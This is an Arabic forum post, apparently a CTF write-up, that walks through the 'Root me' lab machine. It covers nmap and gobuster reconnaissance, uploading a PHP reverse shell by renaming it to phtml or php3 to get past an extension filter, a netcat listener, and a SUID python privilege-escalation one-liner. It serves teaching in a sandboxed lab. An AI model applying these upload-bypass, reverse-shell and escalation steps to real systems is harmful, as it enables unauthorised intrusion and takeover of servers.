مضى على الشبكة و يوم من العطاء.
  • تحذير: يجب على كل روّاد الشبكة تشغيل برامج الاختراق داخل الأنظمة الوهمية وهي بهدف التعلم وحماية الأعضاء والتوعية بها

Root me حل تحدي

3b0-0d3b0-0d is verified member.

{ || مشرف قسم CTF || }
.:: طاقم المشرفين ::.

السمعة:

root me

1700521163941.png


1700521167828.png


يمكن معرفه عدد البورتات المفتوحه , ومعرفه الفيرجن للأباتشي ,ومعرفه السيرفس التي تعمل على بورت معين عن طريق الأمر التالي:

كود:
nmap (ip) -sV
1700521175111.png


يمكن معرفه الـ dir عن طريق الأمر التالي:

gobuster dir -u http://(ip) -w (wordlest)
1700521179318.png


1700521189388.png


1700521195474.png


عند الدخول لصفحه الـ upload نجد مكان يمكن رفع الملفات عليه

1700521201621.png


وعند الدخول لـ panel نجد الملفات التي نرفعها

1700521205940.png


نرفع ريفيرس شل ( يمكن استخدام هذه https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php )

لكن يجب تغيير ال ip بالأيبي الخاص بي وال port الخاص باليسنر الذي سوف نفتحه

1700521212047.png


ثم نذهب للتيرمينال ونكتب الأمر التالي:

كود:
nc -lnvp 1234
1700521215578.png


عند تجربه رفع الملف يعطيك خطأ بأنه لا يمكنك رفع ملف بهذا الإمتداد

يمكن تجربه تغيره إلى امتداد من امتدادات php مثل php3,php4,phtml...

1700521219742.png


1700521223711.png


ثم نقوم بفتحه من الدايركت الـ panel

1700521229341.png


ثم يأتينا اتصال عكسي وتحكم بجهاز الضحية الوهمية

1700521232689.png


نبحث عن ملف الذي كتب اسمه بالسؤال عن طريق الأمر:

كود:
find / -type f -name user.txt 2> /dev/null

1700521236509.png


نجد الملف نقوم باستعراضه ونجد فلاق

1700521239829.png


1700521254104.png


1700521258769.png


عند البحث كيف يمكن رفع صلاحياتك من خلال ببايثون نبحث في موقع https://gtfobins.github.io/

1700521262426.png


1701364489224.png


عن طريق الأمر التالي:

كود:
python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’

1700521271707.png


نبحث عن ملف الذي يحتوي الفلاق وقرائته:
كود:
find / -type f -name root.txt 2> /dev/null

1700521276854.png


1700521281054.png

 

المرفقات

  • 1700521171460.png
    1700521171460.png
    17.4 KB · المشاهدات: 155
  • 1700521267907.png
    1700521267907.png
    10.4 KB · المشاهدات: 154
التعديل الأخير بواسطة المشرف:

آخر المشاركات

فانوس

رمضان
عودة
أعلى